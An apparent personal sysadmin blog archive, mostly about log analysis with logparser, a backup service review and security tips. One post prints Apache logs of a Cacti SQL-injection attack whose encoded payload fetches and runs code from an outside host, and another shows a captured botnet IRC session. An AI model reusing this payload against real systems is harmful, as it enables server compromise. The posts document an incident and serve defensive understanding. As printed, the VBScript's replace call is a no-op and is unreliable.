Recently in Security Category

Working with Bluecoat files in the raw can be time-consuming. Findstr and grep only work so fast. Windows grep is slow. I know SQL syntax OK, so I tend to dump logfiles into databases to analyze them for activity. There are certainly other ways to do it, such as using a reporting tool for Bluecoat. (Splunk's free Bluecoat application, e.g.).

Theoretically, Bluecoat logfiles are the same as W3C web server log files that logparser can consume via the -i:W3C directive.

You can see the fields in a Bluecoat log below.

#Fields: date time time-taken c-ip cs-username cs-auth-group x-exception-id sc-filter-result cs-categories cs(Referer) sc-status s-action cs-method rs(Content-Type) cs-uri-scheme cs-host cs-uri-port cs-uri-path cs-uri-query cs-uri-extension cs(User-Agent) s-ip sc-bytes cs-bytes x-virus-id

For some reason, Bluecoat leaves two spaces between cs(Referrer) and sc-Status, so all the columns to the right of sc(Referrer) past that will be one off. BlueCoat also leaves spaces in cs-categories and surrounds them with quotation marks, so you need to specify -dQuotes:on. Logparser doesn't have a quick and easy way to handle the double-spaces issue, so I wrote a VB Script to handle it. (VBScript is pretty quick at text handling and it's much faster than using search and replace in WordPad or Notepad on a 500-1000 MB File.)

Here's the VBScript:
'start

Set objFSO = CreateObject("Scripting.FileSystemObject")
'change this line to wherever you want to read the input from.
Set objTextFile = objFSO.OpenTextFile("c:\myBluecoatlog.log",1)
Set objNewFile = objFSO.CreateTextFile("c:\myCleanBlueCoatlog.log")
Do Until objTextFile.AtEndOfStream

myString = objTextFile.Readline
objNewFile.WriteLine(Replace (myString, " ", " "))
Loop
'end vbscript
Here's the logparser file:
-------------------start
SELECT TO_LOCALTIME(TO_TIMESTAMP(date, time)) AS date,
time-taken,
c-ip,
cs-username,
cs-auth-group,
x-exception-id,
sc-filter-result,
cs-categories,
cs(Referer) AS Referer,
sc-status AS scStatus,
s-action,
cs-method,
rs(Content-Type) AS ContentType,
cs-uri-scheme,
cs-host,
cs-uri-port,
cs-uri-path,
cs-uri-query,
cs-uri-extension,
cs(User-Agent) AS UserAgent,
s-ip,
sc-bytes,
cs-bytes,
x-virus-id

INTO BlueCoat4
FROM c:\myCleanBlueCoatlog.log
------------------end
And here's the command line for logparser. (Save the logparser file as c:\scripts\log\bluecoat.sql)

logparser file:c:\scripts\log\bluecoat.sql -i:W3C -o:SQL -server:sqlservername -database:BLUECOAT -createtable:ON -dQuotes:ON

Statistics:
-----------

Elements processed: 613076
Elements output: 613076
Execution time: 241.20 seconds (00:04:1.20)
About 2500 lines/sec. Processor utilization is almost zero for SQL and logparser, so it's all about disk time.

The above is from a file that's 310,935,417 bytes large. That means BlueCoat logs are about 507 bytes per line, or 0.5k per line before compression. The last time I checked BlueCoat gz compression, it was about 15% of the original file size. Compressed, the line would cost you 76 bytes.

Niether did I. Hardly anyone knows, because few people take DHS seriously, and nobody outside of the Federal government has said "Cyber" since the nineties. I attended a computer security conference recently and listened to a panel of current and former federal officials speak about "Cyber" security. They might one day be able to secure government systems, but they're a long way off from protecting you and me online. One of the few things they can do to protect us is to stage a public awareness campaign -- thus we have Cybersecurity Awareness Month.

Why doesn't Google have a Cybersecurity graphic? Online providers don't want you to think about security. Banks don't want you to think about online security. If you thought about security when you signed up for online banking, you might not do it. Without the regulatory agencies, the banks would leave you liable for all losses -- event those caused by the bank's own security lapses, as happened in the UK.

A banking-industry consultant at the same conference said two striking things:

1. Bank marketers fought tooth and nail against FFIEC regulations requiring two-factor authentication for online banking logons. (That means you need your password AND something else to log on.) Banking marketers want to make easy for you (or a hacker) to log on and transfer funds.


2. Banking customer service representatives are just as dumb as the customers when it comes to online security.

If your bank account gets hacked, your bank isn't going to be of much help. They might get some money back, but in most cases, they won't. Your money's gone. The same goes for any other account of yours that gets hacked, whether it's Facebook, GMail, or Yahoo. Nobody's going to help you much.

So take the time now to do a few things to ensure your online security.

1. Use antivirus and make sure it's up to date. If you're on Windows, there are several free antivirus packages available, such as Microsoft Security Essentials , Avast , and Avira . Password-stealing viruses infect computers every day. If you want to tweak out on antivirus effectiveness comparisons, go here.


2. Patch your computer. It doesn't matter if you're windows, mac, unix, linux or bsd. Patch.


3. Change your banking password. Change your email password, because all your password resets go there. Change your security questions, because those reset your passwords. If you're using the same password from college, and your college system gets hacked and reveals your password, then they will find your other accounts.


4. Realize that you are a hundred times more likely to fall for a phishing email than you are to click on an online ad. (Phishing emails are now so common that you might get one that coincides with a recent transaction, making you think it's real.) Now that banks have increased their online security, the hackers are targeting you -- the soft spot.


5. Also realize there are are now office buildings full of professional hackers working in shifts trying to get to your money. (Another panelist, Chris Roberts, talked about research he had done observing the building in an unnamed country in Eastern Europe. Some of his work is available on McAfee's hacker-commerce site.)


6. Don't use unsecured wireless networks. Secure your home wireless network. (Replace WEP encryption with WPA or WPA2.)
   

Just because disk space is getting cheap, don't think that storage is cheap. A referral from Slashdot to Backblaze's blog charted the situation out accurately. The cost of a petabyte of storage on raw SATA hard drives is $81,000. On Amazon and EMC, it's $2.8 million. If Backblaze really could create their own enterprise storage devices, then it would be possible to offer backups at $5/month for unlimited storage. Backblaze even offers a 15-day free trial, so I tried it, although I was skeptical.

Catches:
1) You need to use their client.
2) Their client doesn't run on Windows Server or Linux -- just WinXP, Vista, and Macintosh. (Even if you run the installer in XP compatible mode on Windows server, it still doesn't install.)
3) The $5/month is for one computer, not all the computers in my house.
4) rsync doens't work with Windows/samba shares. (You may, however, be able to get rsync to work to a Macintosh. I haven't tested yet.) (Update below: you can install an NFS server onto WindowsXP/Vista to get rsync to work, or you could do it from Windows via an SSH rsync script.)

Solution: I installed it on a Vista workstation, created a share, and copied the few things I really need backed up to it. I also wrote scripts to transfer my PBX backups to my backup and log host and then copy the files from the backup server to the windows share via smbclient. I'll skip the part about configuring password-less logins for SSH via ssh-keygen keys, as well as the kinit for logging into windows via smbclient. (I also never was able to mount.cifs via kinit, just smbclient.)

So what happened when I tried to back up 15 GB on my Vista box to Backblaze? Not much -- the files just transferred. iPod library -- check. Photos -- check. My mrtg indicated that bandwidth increased to about 310 kbps for four days. I was still able to make phone calls via my SIP trunk to vitelity with no problems. (g729 to my SIP provider and alaw to my friends' PBX servers via IPSec VPN.)

Bandwidth used:
`Weekly' Graph (30 Minute Average)

Max Average Current
In 501.9 kb/s (0.5%) 56.4 kb/s (0.1%) 47.9 kb/s (0.0%)
Out 1360.2 kb/s (1.4%) 168.6 kb/s (0.2%) 29.3 kb/s (0.0%)

Security comments: Backblaze says it encrypts files, but doesn't offer details on the algorithm or implementation. (e.g AES-CBC, etc.) Backblaze does offer you the option of using a private key, so that only you (assuming you don't forget the key) can access your files.

My advice: If it needs to stay secure, encrypt the files yourself before they hit the local hard disk. You can even do a loopback mount (Super-awesome tutorial there) to an AES-encrypted file on a samba share, and rsync will work, but the whole file will change, requiring it all to be sent to Backblaze.

Update: You can use rsync to get your Linux/BSD/Unix files over to your windows box, but you'll need to install an NFS Server on your windows box. You could also use Microsoft's Services for Unix, but it's easier just using the Allegro server.

To find account lockout events on multiple domain controllers, download logparser 2.2 and execute the following command in a domain admin context (e.g. runas user:domain\administrator logparser.exe), where the part below the command is in "lockouts.sql". The account lockout event is 644 -- if you need to find others, read Microsoft's KB174074 Also, this script will access each domain controller's security event log sequentially, so if you're in a hurry, execute several different logparser processes for each domain controller.

logparser.exe file:c:\scripts\logparser\lockouts.sql -i:EVT -o:datagrid

------stick this part in lockouts.sql
SELECT
timegenerated AS LogonTime,
extract_token(strings, 0, '|') AS UserName,
message as Message
FROM \\domaincontroller1\security, \\domaincontroller2\security, \\domaincontrolle2\Security
WHERE EventID = 644
-----end here

If you want the output to go into a database instead of a datagrid (Excel-type) table, make the logparser command look like this:

logparser.exe file:c:\scripts\logparser\lockouts.sql -o:SQL -server:myDBservername driver:"SQL Server" -database:myDBname -createtable:ON

Table name will end up matching your dbname. Set -createtable to off after you run it once.

Props to: Microsoft's Log Parser Toolkit, by Gabriele Giuseppini and Mark Burnett.

If you're going to be doing anything with windows logs, buy the book. It's more useful than several log management software packages I've demo'ed.

Download Log Parser here.

I had 41,000 spam comments in my photo gallery. I had thousands of unpublished spams on my blog here. Spam comments were showing up as valid keywords attracting traffic on Google searches. So a couple of weeks ago, I shut down commenting in MovableType. It turns out that one other problem, mt.cgi consuming 2 G of RAM and all my processor time, was a separate issue. ImageMagick is NOT optional in MT 4.2. I had installed it, but MT couldn't find it. Thus an infinite loop consumed all my resources through our favorite cgi-bin, mt.cgi. Fixed that, but what about comments?

I didn't think Gallery was popular enough to be targeted by automated scripts. I thought CAPTCHAs could stop them. I was quite wrong. I upgrade Gallery to 2.3 and got me a WordPress API key for Akismet, which I'm now using in MT and Gallery.

I also looked at my logs, and found that 99% of my Gallery spam comments came from a limited set of IPs. Since I started blocking them at the firewall, I've seen 13,000 attempted hits from them. Here they are. If you're running Gallery, ban them now.

Secunia says Cacti has four known vulnerabilities. I had forgotten that I had installed Cacti when I was trying to count the pages I had printed and compare those results those from my HP printer. Same IP as my computer was IRCing to. I should start tracking changes so I can have a record of what was changed, when it was changed, and if I granted myself access.

Here's the log files from apache:

213.189.5.233 - - [21/May/2007:14:44:14 -0400] "GET /cacti/ HTTP/1.0" 200 1327 "-" "-"
213.189.5.233 - - [22/May/2007:04:08:21 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,119,103,101,116,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,46,106,112,103,32,45,79,32,47,116,109,112,47,103,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:07 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,102,101,116,99,104,32,45,111,32,47,116,109,112,47,103,111,46,106,112,103,32,104,116,116,112,58,47,47,105,99,101,109,97,110,46,109,97,114,116,101,46,114,111,47,103,111,46,106,112,103,59,116,97,114,32,120,122,118,102,32,47,116,109,112,47,103,111,46,106,112,103,32,45,67,32,47,116,109,112,59,47,116,109,112,47,103,111,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/rra/suntzu.log HTTP/1.0" 404 296 "-" "-"
213.189.5.233 - - [22/May/2007:04:17:09 -0400] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(114,109,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111 HTTP/1.0" 200 18 "-" "-"

Apparently, that was all it took for my server to be compromised.

Also, I saved the tcpdump from my previous post as an HTML file for people that had trouble with it.

IIf you've ever wondered exactly how a vulnerability is exploited, or how botnets happen, check the below. Keep in mind that my system is up-to-date on just about everything I can find to update on it. I've also informed the abuse address of the IP in question about what was going on over a month ago, and the rogue server is still out there, relaying information from compromised Linux servers.

I keep a lot of outbound ports closed so that if one of my servers is compromised, it doesn't become another bot on the net. I finally caught the process again, so I started a capture and then opened the ports. I'm not sure what to make of it because the IP address in question goes back to what appears to be a dedicated server in Italy, but the login information says it's a NASA IRC server. What NASA would be doing on serving IRC to the public is beyond me, unless it's a honeypot. It's probably not a real NASA server, at least that's what I hope. Anyway, here are the fun details of what happens when my server tries to call home to its haxor:

The packet analysis also reveals a clue about the origin of the hack: Mihai is the Romanian version of Michael.

Download the uncensored TCPDump file and see for yourself.

My server: SYN
213.92.118.223 223-118-92-213.serverdedicati.seflow.net ACK
my server: ACK SYN
my server: ...i
my server: NICK a3sh-.
: NOTICE AUTH :*** Looking up your hostname..NOTICE AUTH :*** Checking Ident..
my server: ....
: NOTICE AUTH :*** No ident response..
my server: FF 86 C5 CD
: NOTICE AUTH :*** Found your hostname.
my server: ....
:.y.I
my server: USER nh2ies x.x.x.x 213.92.118.223 :Linux mrtg.sampas.net 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:17:21 EST 2007 i686 i686 i386 GNU/Linux.
: PING :1041065789..
my server: ....
: .y..
my server: PONG :1041065789.
: (ACK)
: www.nasa.gov 433 * a3sh- :Nickname is already in use..
my server: (ACK)
my server: NICK a3sh-685.
: :www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network : a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..
my server: JOIN #mihai.
::www.nasa.gov 001 a3sh-685 :Welcome to the Internet Relay Network a3sh-685..:www.nasa.gov 002 a3sh-685 :Your host is www.nasa.gov, running version beware1.5.7..:www.nasa.gov 003 a3sh-685 :This server was created Tue Jul 13 2004 at 20:36:17 GMT..:www.nasa.gov 004 a3sh-685 www.nasa.gov beware1.5.7 dgikoswx biklmnoprstv..:www.nasa.gov 005 a3sh-685 MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server..:www.nasa.gov 005 a3sh-685 NICKLEN=19 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server..:www.nasa.gov 251 a3sh-685 :There are 172 users and 0 invisible on 1 servers..:www.nasa.gov 254 a3sh-685 1 :channels formed..:www.nasa.gov 255 a3sh-685 :I have 172 clients and 0 servers..:www.nasa.gov NOTICE a3sh-685 :Highest connection count: 195 (195 clients)..:www.nasa.gov 422 a3sh-685 :MOTD File is missing..:www.nasa.gov NOTICE a3sh-685 :on 1 ca 1(4) ft 10(10)..

:a3sh-685!~nh2ies@c-68-34-65-58.hsd1.md.comcast.net JOIN :#mihai..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-685 a3sh-9337 a3sh-4554 a3sh-8354 a3sh-2934 a3sh-3103 a3sh-8151 a3sh-4633 a3sh-3872 a3sh-2552 a3sh-1595 a3sh-9230 a3sh-5907 a3sh-2313 a3sh-6041 a3sh-2448 a3sh-5134 a3sh-3633 a3sh-5025 a3sh-1979 a3sh-9893 a3sh-8688 a3sh-7544 a3sh-4987 a3sh-975 a3sh-8640 a3sh-7756 a3sh-6376 a3sh-9321 a3sh-5422 a3sh-5761 a3sh-9259 a3sh-5956 a3sh-7978 a3sh-9088 a3sh-701 a3sh-4473 a3sh-7260 a3sh-2013 a3sh-9890 a3sh-933 a3sh-8007 a3sh-6486 a3sh-7318 a3sh-5495 a3sh-6205 a3sh-6078..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-7555 a3sh-791 a3sh-1336 a3sh-5923 a3sh-4822 a3sh-8527 a3sh-4988 a3sh-90 a3sh-4895 a3sh-7019 a3sh-6666 a3sh-4330 a3sh-8521 a3sh-215 a3sh-5509 a3sh-6106 a3sh-4579 a3sh-8655 a3sh-1998 a3sh-9573 a3sh-5017 a3sh-6554 a3sh-8403 a3sh-288 a3sh-3328 a3sh-4059 a3sh-6246 a3sh-697 a3sh-7085 a3sh-9646 a3sh-8876 a3sh-6779 a3sh-3730 a3sh-8248 a3sh-4757 a3sh-7497 a3sh-4715 a3sh-4357 a3sh-229 a3sh-4681 a3sh-8629 a3sh-2734 a3sh-6290 a3sh-930 a3sh-1515 a3sh-1103 a3sh-3405 a3sh-9597..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-914 a3sh-2419 a3sh-1961 a3sh-624 a3sh-9217 a3sh-8124 a3sh-9198 a3sh-1667 a3sh-7710 a3sh-3272 a3sh-2880 a3sh-5360 a3sh-9749 a3sh-60 a3sh-6378 a3sh-2191 a3sh-8644 a3sh-1313 a3sh-2447 a3sh-3410 a3sh-4480 a3sh-8506 a3sh-1625 a3sh-5664 a3sh-5614 a3sh-9804 a3sh-1344 a3sh-4523 a3sh-7203 a3sh-3438 a3sh-36

46 a3sh-6682 a3sh-8430 a3sh-700 a3sh-4929 a3sh-9957 a3sh-9284 a3sh-1775 +a3sh-3250 a3sh-2594 a3sh-3037 a3sh-3353 a3sh-2931 a3sh-366 a3sh-934 a3sh-1772 a3sh-8760 a3sh-7777..:www.nasa.gov 353 a3sh-685 = #mihai :a3sh-8519 a3sh-8691 a3sh-9382 a3sh-3749 a3sh-8126 a3sh-5627 a3sh-1038 a3sh-3316 a3sh-5240 a3sh-379 a3sh-6854 a3sh-9518 a3sh-1493 a3sh-7073 a3sh-9670 +a3sh-3201 a3sh-7933 a3sh-4989 a3sh-960 a3sh-3584 a3sh-7571 a3sh-9905 a3sh-6198 a3sh-9436 a3sh-7021 a3sh-9951 a3sh-43 a3sh-1578 @a3sh-..:www.nasa.gov 366 a3sh-685 #mihai :End of /NAMES list...